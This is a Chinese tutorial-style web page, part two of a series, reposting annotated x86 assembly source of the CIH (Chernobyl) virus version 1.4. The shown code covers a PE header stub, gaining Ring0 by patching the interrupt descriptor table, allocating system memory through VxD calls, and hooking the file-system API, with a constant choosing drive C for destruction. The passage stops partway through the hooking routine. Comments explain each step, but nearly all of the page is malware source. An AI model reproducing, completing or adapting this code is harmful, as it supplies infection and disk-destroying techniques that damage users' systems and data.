0

0

病毒程序源码实例剖析-CIH病毒[2]

黄舟

黄舟

发布时间:2017-01-17 11:15:08

|

2548人浏览过

|

来源于php中文网

原创

病毒程序源码实例剖析-cih病毒[2]

OriginalAppEXE SEGMENT 
  
  ;PE格式可执行文件文件头
  FileHeader: 
  db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h 
  db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h 
  db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h 
  db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh 
  db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h 
  db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h 
  db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh 
  db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh 
  db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h 
  db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah 
  db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h 
  db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h 
  db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h 
  db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h 
  db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h 
  db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h 
  db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h 
  db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h 
  db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h 
  db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
  dd 00000000h, VirusSize 
  
  OriginalAppEXE ENDS 
  
  ; 病毒程序开始
  TRUE = 1 
  FALSE = 0 
  DEBUG = FALSE 
  
  ;标识其版本号为1.4版
  MajorVirusVersion = 1 ;主版本号 
  MinorVirusVersion = 4 ;次版本号 
  VirusVersion = MajorVirusVersion*10h+MinorVirusVersion ;合成版本号 
  
  IF DEBUG ;是否调试 
  FirstKillHardDiskNumber = 81h ;破坏D盘
  HookExceptionNumber = 05h ;使用5号中断 
  ELSE 
  FirstKillHardDiskNumber = 80h ;破坏C盘
  HookxceptionNumber = 03h ;使用3号中断 
  ENDIF 
  
  FileNameBufferSize = 7fh 
  
  ;病毒代码段开始 
  VirusGame SEGMENT 
  
  ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame 
  ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame 
  
  MyVirusStart: 
  push ebp 
  
  ;修改系统异常处理,避免产生错误提示信息 
  lea eax, [esp-04h*2] 
  xor ebx, ebx 
  xchg eax, fs:[ebx] 
  
  call @0 
  
  @0: 
  pop ebx ;获取程序起始偏移量,用此偏移量+相对偏移量获得绝对地址
  lea ecx, StopToRunVirusCode-@0[ebx] 
  push ecx 
  push eax 
  
  ; 修改中断描述表,以获得最高Ring0级权限 
  push eax 
  sidt [esp-02h] ;获得中断描述表的基址到ebx 
  pop ebx ; 
  
  add ebx, HookExceptionNumber*08h+04h ;计算要用中断的基址到ebx 
  
  cli ;在修改之前先关中断
  
  mov ebp, [ebx] ;获得异常处理的基址
  mov bp, [ebx-04h] ;获得入口
  
  lea esi, MyExceptionHook-@1[ecx] 
  
  push esi ;esi为病毒中断例程地址 
  
  mov [ebx-04h], si ; 
  shr esi, 16 ;修改异常 
  mov [ebx+02h], si ;修改中断基址使指向病毒中断例程 
  
  pop esi 
  
  ;生成进入ring0级的异常
  int HookExceptionNumber ;以中断的方式进入Ring0级 
  ReturnAddressOfEndException = $ 
  
  ; 合并所有病毒代码 
  push esi 
  mov esi, eax ;esi指向病毒开始处 
  
  ;循环进行复制 
  LoopOfMergeAllVirusCodeSection: 
  mov ecx, [eax-04h] 
  
  rep movsb ;复制病毒代码到分配好的系统内存首址 
  sub eax, 08h 
  mov esi, [eax] 
  or esi, esi 
  jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1
  
  jmp LoopOfMergeAllVirusCodeSection ;复制下一段 
  
  QuitLoopOfMergeAllVirusCodeSection: 
  pop esi 
  int HookExceptionNumber 
  
  ; 保存异常处理 
  ReadyRestoreSE: 
  sti ;开中断 
  xor ebx, ebx 
  jmp RestoreSE 
  
  ; 当发生异常时,说明目前在Windows NT下,病毒将停止运行,直接跳转到原来程序
  StopToRunVirusCode: 
  @1 = StopToRunVirusCode 
  
  xor ebx, ebx 
  mov eax, fs:[ebx] 
  mov esp, [eax] 
  
  RestoreSE: 
  pop dword ptr fs:[ebx] 
  pop eax 
  
  ; 跳转到原来程序,正常执行 
  pop ebp 
  
  push 00401000h ; Push Original 
  OriginalAddressOfEntryPoint = $-4 ;把原程序的起始地址入栈
  ret ;以子程序返回形式返回到原程序的开始处
  ;病毒初始化模块
  MyExceptionHook: 
  @2 = MyExceptionHook 
  
  jz InstallMyFileSystemApiHook ;如果病毒代码已拷贝好了
  ;就转到安装系统钩子的程序 
  
  mov ecx, dr0 ;察看dr0是否设置过(dr0为病毒驻留标志)
  jecxz AllocateSystemMemoryPage ;没有设置,则分配系统内存 
  
  add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException 
  
  ;返回到原来的程序 
  ExitRing0Init: 
  mov [ebx-04h], bp ; 
  shr ebp, 16 ; Restore Exception 
  mov [ebx+02h], bp ;恢复原来的中断基址 
  
  iretd ;中断返回 
  
  ; 分配将要使用的系统内存
  AllocateSystemMemoryPage: 
  mov dr0, ebx ;设置病毒驻留的标志dr0
  push 00000000fh ; 
  push ecx ; 
  push 0ffffffffh ; 
  push ecx ;调用方法ULONG EXTERN _PageAllocate(ULONG nPages, 
  ;ULONG pType, ULONG VM, ULONG AlignMask, ULONG minPhys, 
  ;ULONG maxPhys, ULONG *PhysAddr,ULONG flags); 
  push ecx ; 
  push ecx ; 
  push 000000001h ; 
  push 000000002h ; 
  int 20h ; VXD调用
  _PageAllocate = $ 
  dd 00010053h ;使用eax、ecx、edx和flags寄存器
  add esp, 08h*04h ;恢复栈指针 
  
  xchg edi, eax ;edi指向分配好的系统内存首址 
  lea eax, MyVirusStart-@2[esi] ;eax指向病毒开始处 
  
  iretd ;退出中断 
  
  ; 初始化文件系统钩子
  InstallMyFileSystemApiHook: 
  lea eax, FileSystemApiHook-@6[edi] ;指向文件系统钩子程序首址 
  
  push eax ; 
  int 20h ; Vxd调用IFSMgr_InstallFileSystemApiHook 
  IFSMgr_InstallFileSystemApiHook = $ 
  dd 00400067h ;使用eax、ecx、edx和flags 寄存器
  
  mov dr0, eax ;保存原来的文件系统钩子程序首址到dr0
  pop eax ;eax等于文件系统钩子程序首址 
  
  ;保存原来的IFSMgr_InstallFileSystemApiHook功能调用的入口
  mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi] 
  mov edx, [ecx] ;edx为IFSMgr_InstallFileSystemApiHook的入口 
  mov OldInstallFileSystemApiHook-@3[eax], edx 
  
  ; 修改IFSMgr_InstallFileSystemApiHook入口
  lea eax, InstallFileSystemApiHook-@3[eax] 
  mov [ecx], eax ;设置新的IFSMgr_InstallFileSystemApiHook功能调用的地址
  ;使指向InstallFileSystemApiHook 
  cli ;关中断

以上就是病毒程序源码实例剖析-CIH病毒[2]的内容,更多相关内容请关注PHP中文网(www.php.cn)!

Unscreen
Unscreen

AI智能视频背景移除工具

下载

热门AI工具

更多
DeepSeek
DeepSeek

幻方量化公司旗下的开源大模型平台

豆包大模型
豆包大模型

字节跳动自主研发的一系列大型语言模型

通义千问
通义千问

阿里巴巴推出的全能AI助手

腾讯元宝
腾讯元宝

腾讯混元平台推出的AI助手

文心一言
文心一言

文心一言是百度开发的AI聊天机器人,通过对话可以生成各种形式的内容。

讯飞写作
讯飞写作

基于讯飞星火大模型的AI写作工具,可以快速生成新闻稿件、品宣文案、工作总结、心得体会等各种文文稿

即梦AI
即梦AI

一站式AI创作平台,免费AI图片和视频生成。

ChatGPT
ChatGPT

最最强大的AI聊天机器人程序,ChatGPT不单是聊天机器人,还能进行撰写邮件、视频脚本、文案、翻译、代码等任务。

相关专题

更多
微信文件过期恢复教程
微信文件过期恢复教程

本专题整合了微信文件过期恢复方法、技巧教程,阅读专题下面的文章了解更多详细内容。

0

2026.02.04

抖音网页版入口与视频观看指南 抖音官网视频在线访问
抖音网页版入口与视频观看指南 抖音官网视频在线访问

本专题汇总了抖音网页版的入口链接、官方登录页面以及视频观看入口,帮助用户快速访问抖音网页版,提供免登录访问方式和直接进入视频播放页面的方法,确保顺利浏览和观看抖音视频。

63

2026.02.04

学习通网页版入口与在线学习指南 学习通官网登录与使用方法
学习通网页版入口与在线学习指南 学习通官网登录与使用方法

本专题详细汇总了学习通网页版入口与登录方法,提供学习通官方网页端入口、学生登录平台、网页版使用指南等内容,帮助用户快速稳定地登录学习通官网,顺利进入学习平台,提升学习效率和体验。

9

2026.02.04

Python Web 框架 Django 深度开发
Python Web 框架 Django 深度开发

本专题系统讲解 Python Django 框架的核心功能与进阶开发技巧,包括 Django 项目结构、数据库模型与迁移、视图与模板渲染、表单与认证管理、RESTful API 开发、Django 中间件与缓存优化、部署与性能调优。通过实战案例,帮助学习者掌握 使用 Django 快速构建功能全面的 Web 应用与全栈开发能力。

9

2026.02.04

Java 流式处理与 Apache Kafka 实战
Java 流式处理与 Apache Kafka 实战

本专题专注讲解 Java 在流式数据处理与消息队列系统中的应用,系统讲解 Apache Kafka 的基础概念、生产者与消费者模型、Kafka Streams 与 KSQL 流式处理框架、实时数据分析与监控,结合实际业务场景,帮助开发者构建 高吞吐量、低延迟的实时数据流管道,实现高效的数据流转与处理。

3

2026.02.04

Golang 容器化与 Docker 实战
Golang 容器化与 Docker 实战

本专题深入讲解 Golang 应用的容器化与 Docker 部署,涵盖 Docker 基础概念、容器构建与镜像管理、Go 应用的 Dockerfile 编写、跨平台容器部署与优化、Docker Compose 和 Kubernetes 部署工具。通过实际案例,帮助学习者掌握 如何将 Golang 应用容器化并实现高效部署与管理,提升系统的可扩展性与运维效率。

3

2026.02.04

全国统一发票查询平台入口合集
全国统一发票查询平台入口合集

本专题整合了全国统一发票查询入口地址合集,阅读专题下面的文章了解更多详细入口。

59

2026.02.03

短剧入口地址汇总
短剧入口地址汇总

本专题整合了短剧app推荐平台,阅读专题下面的文章了解更多详细入口。

110

2026.02.03

植物大战僵尸版本入口地址汇总
植物大战僵尸版本入口地址汇总

本专题整合了植物大战僵尸版本入口地址汇总,前往文章中寻找想要的答案。

56

2026.02.03

热门下载

更多
网站特效
/
网站源码
/
网站素材
/
前端模板

精品课程

更多
相关推荐
/
热门推荐
/
最新课程
Django 教程
Django 教程

共28课时 | 3.9万人学习

Excel 教程
Excel 教程

共162课时 | 15.4万人学习

Kotlin 教程
Kotlin 教程

共23课时 | 3.2万人学习

关于我们 免责申明 举报中心 意见反馈 讲师合作 广告合作 最新更新
php中文网:公益在线php培训,帮助PHP学习者快速成长!
关注服务号 技术交流群
PHP中文网订阅号
每天精选资源文章推送

Copyright 2014-2026 https://www.php.cn/ All Rights Reserved | php.cn | 湘ICP备2023035733号